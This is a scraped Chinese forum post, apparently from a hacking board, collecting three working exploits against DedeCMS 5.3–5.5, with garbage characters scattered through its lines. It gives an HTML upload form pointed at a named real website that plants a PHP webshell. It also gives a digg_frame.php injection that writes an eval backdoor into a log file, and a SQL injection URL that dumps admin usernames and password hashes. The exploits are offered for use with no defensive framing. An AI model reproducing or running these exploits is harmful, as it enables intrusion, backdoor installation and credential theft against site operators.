( ^" c* k5 O: H2 W7 e
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞. ?; ?# J9 l! N! p  d( U( v
<html>: b1 ^  R  X* ^2 `% I, ?
<head># v( T& {3 S7 p8 Y1 i/ ~1 }# H
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>4 l0 E1 K' x3 @9 V  a
</head>
) U/ P3 @: d9 i0 z$ u<body style="FONT-SIZE: 9pt">
3 |: f- a2 B: R---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />% A. I3 I1 J' X
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
4 P3 m: A0 @, k<input type='hidden' name='activepath' value='/data/cache/' />$ C6 b7 J$ ~- o* Z
<input type='hidden' name='cfg_basedir' value='../../' />% d+ q. N& k# U5 \% W
<input type='hidden' name='cfg_imgtype' value='php' />
- `2 ^& ?* r  ]: F<input type='hidden' name='cfg_not_allowall' value='txt' />
" h8 i+ t' T3 H<input type='hidden' name='cfg_softtype' value='php' />4 D, [" |1 S5 v& t
<input type='hidden' name='cfg_mediatype' value='php' />
  `# p* F7 c( U0 d/ x- C2 s# ^<input type='hidden' name='f' value='form1.enclosure' />
3 @+ F: V, ]1 R$ M. O  }<input type='hidden' name='job' value='upload' />
- Q/ Y7 l( t" v- x' [- b: A! s. C<input type='hidden' name='newname' value='fly.php' />; U; a2 A) f0 h- r
Select U Shell <input type='file' name='uploadfile' size='25' />+ x' Z% J5 Q. `8 F' n' S, e
<input type='submit' name='sb1' value='确定' />) ?' }! V7 w! C5 f
</form>
( r4 Z' P9 W4 K: n; P7 h<br />It's just a exp for the bug of Dedecms V55...<br />9 w# [$ F# T7 m
Need register_globals = on...<br />
- B1 Z0 p0 y0 T2 y0 Z- ]  p+ `+ P  rFun the game,get a webshell at /data/cache/fly.php...<br />8 R5 s" q3 u" \0 R0 |
</body>- b5 y9 n  G+ H
</html>& D; p2 Q! @3 r. b, Y) Z$ N

4 \% B/ ]' P. K5 ~9 I
" g# B' k# A, k2 q
& ^+ e8 Q. q# Y4 J% E; @' w4 N$ ?4 L& j, n

0 c* A) j# ~% W: T+ y
3 u6 O4 w+ A4 ^6 Z% R# ]/ p' \( B  p# U4 _& l) p$ Q

5 u( ~, t# V. q
* ]/ y& }# L* b) E& f" x. q
8 s  k. h" ?5 [4 A7 `2 a织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
( X/ v& I) w+ ~2 c  W利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
! a! C& Y' m* j1 F1. 访问网址:# `5 b5 t7 h5 ?3 z5 i0 u
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>9 |2 E, t4 g6 u7 M
可看见错误信息
6 P5 N5 V* p! ^/ ~& C
; Y) V+ l+ o# ?1 f) i2 s5 z
- ~: \. ^2 L' }2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。; {3 V3 Q3 [* X& E
int(3) Error: Illegal double '1024e1024' value found during parsing9 _$ C" g/ r6 d4 k4 U& Z
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
% E3 H& F$ x: s! A' V2 y* n2 k: z! z* O. p" u) e" @

4 ^& m" z4 Q% Q: L( j4 c' C3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
, ~: D" ?# J  k9 l/ M  J. ?% _4 y6 ^2 X5 }" _

8 i! V  d8 r6 e' {' }<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>% z9 z9 F+ m+ U( `* F) O
$ B1 ~& G$ [0 C8 f$ R5 i
3 x3 j! I: }) p, D( d3 O/ G2 C0 g& [
按确定后的看到第2步骤的信息表示文件木马上传成功.+ T8 m0 r/ J) x, X$ C8 ^

+ `5 @4 N0 M. G9 T0 @* C/ {5 l$ k' R! c' V& L. V
) S0 _2 j, e- n% M) R0 h, L
3 {3 D- B( V1 Y" {
6 o+ w1 ?6 a5 S" d/ W( `' I+ @% Y
( E0 U% c. f3 `$ Y" C2 m+ w
: Q0 F' \: c- {6 v# `+ E, |! Q
# k1 X7 {! X# @% e, T

0 ^! f) u9 Z0 z, `$ O; c7 y( d7 B4 V8 x. P; O  f& n

" s5 p/ ^+ ^- Q9 ~5 B; ]$ o
; g, W" q& K$ [( o; s, P织梦(DedeCms)plus/infosearch.php 文件注入漏洞6 Q: Q8 d2 U# c/ k  C% \
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表